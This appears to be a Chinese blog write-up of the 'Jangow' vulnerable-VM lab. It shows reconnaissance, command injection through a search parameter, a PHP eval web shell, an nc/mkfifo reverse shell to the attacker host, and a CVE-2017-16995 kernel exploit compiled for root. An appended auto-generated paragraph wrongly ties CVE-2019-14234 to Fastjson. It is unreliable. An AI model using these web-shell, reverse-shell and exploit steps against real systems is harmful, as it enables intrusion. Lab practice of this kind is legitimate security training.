vulhub靶场-Jangow

本文介绍了如何下载并部署一个虚拟机环境,通过网络配置和漏洞扫描发现Web服务器漏洞,利用命令执行和文件上传进行权限提升,最终通过Metasploit找到并利用CVE-2017-16995漏洞获取root权限。
摘要由CSDN通过智能技术生成

下载&部署

下载

下载链接:

https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

点击下载即可

部署

因为源虚拟机是从virtualbox导出的,为了避免繁琐的操作步骤,用virtualbox来导入

virtualbox下载地址:

https://download.virtualbox.org/virtualbox/7.0.14/VirtualBox-7.0.14-161095-Win.exe

安装完成后选择导入就好了

导入完成后,右键该虚拟机打开设置,将网络改为桥接网卡

然后启动虚拟机就可以开始打靶场了

通关步骤

虚拟机上已经显示了它的IP地址,通常我们确定IP地址的话需要使用nmap去扫描该网段确认存活

使用ping确认kali是与靶场网络连通的,注意kali要与靶机在同一网段

查看端口开放情况

nmap 192.168.1.156

发现目标开放了21、25、80端口,开启了80端口说明该服务器有web服务

使用dirsearch扫描站点目录发现/.backup目录

访问/.backup发现mysql配置文件,有mysql的账号密码,但该服务器未开放3306端口,因此无法远程连接,先寻找其他的线索

访问ftp服务需要验证,我们不知道ftp的账号密码

点击site进入页面

在页面的Buscar处点击后url变为:

http://192.168.1.156/site/busque.php?buscar=

猜测此处存在命令执行或文件包含漏洞,尝试了一下../../../../../../../etc/passwd没有回写,输入whoami命令出现回写

http://192.168.1.156/site/busque.php?buscar=whoami

因此此处有命令执行漏洞,同时www-data是网站权限

尝试写入一句话木马:

http://192.168.1.156/site/busque.php?buscar=echo '<?php @eval($_POST['a']);?>' >> shell.php

此时没有明显回写,我们使用ls命令查看当前目录文件,可以发现shell.php文件已经写入了

随后使用pwd命令查看绝对路径

使用蚁剑进行连接

因为我们正常访问页面实际上就是从/var/www/html/目录出发的,所以这里URL地址是

http://192.168.1.156/site/shell.php,然后密码是写入文件的a

右键打开虚拟终端

接下来就是想方设法地寻找提权到root的方法,我们使用uname -a查看系统内核版本,发现系统内核为ubuntu4.4.0

使用Metasploit(MSF)的search指令寻找是否该版本存在漏洞

searchsploit ubuntu 4.4

发现Local Privilege Escalation(本地权限升级)漏洞,在网上找到了对应了漏洞编号为CVE-2017-16995,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。 非特权用户可以使用此漏洞获得权限提升。我们将exp给下载下来

searchsploit -m 45010.c

将文件通过蚁剑上传到目标服务器

接下来进行反弹shell,使用kali进行监听443端口

使用蚁剑的虚拟终端输入以下命令反弹shell成功,IP为kali的IP,端口为kali监听的端口

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.142 443 >/tmp/f

python3 -c 'import pty;pty.spawn("/bin/bash")' //升级为交互式shell

随后使用刚才上传的45010.c进行提权操作

gcc -o exp 45010.c   //编译为执行文件exp
chmod +x exp 		 //给exp赋予执行权限
./exp				 //运行提权脚本

进入root目录查看proof.txt文件

解密该MD5字段为[空密码]

  • 20
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理特殊构造的JSON字符串时存在漏洞,攻击者可以利用这个漏洞执行任意的Java代码。 在CVE-2019-14234中,攻击者可以通过构造特定的JSON字符串并发送给受影响的应用程序来利用该漏洞。当应用程序使用Fastjson解析并处理该字符串时,恶意的Java代码将被执行。攻击者可以利用这个漏洞来执行远程代码,从而导致敏感信息泄露、服务器被入侵等危害。 为了防止CVE-2019-14234的攻击,可以采取多种措施。首先,更新vulhub中的Fastjson组件到最新版本,以获得最新的安全修复。其次,在编码和处理JSON数据时,应谨慎处理不受信任的输入。可以使用输入验证和过滤来确保传入的数据是符合预期的,并且不包含恶意的代码。 此外,安全审计和漏洞扫描工具也可以用于检测和修复CVE-2019-14234漏洞。通过定期扫描应用程序,可以及时发现和修复潜在的安全问题。最后,加强网络安全意识教育,提高开发人员和用户对网络安全的认识和理解,从而进一步提高防范和应对漏洞攻击的能力。 综上所述,CVE-2019-14234是vulhub靶场中的一个Fastjson组件漏洞,可以被攻击者利用来执行任意的Java代码。修复这个漏洞的方法包括更新Fastjson组件、输入验证和过滤、安全审计和漏洞扫描以及加强网络安全意识教育。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值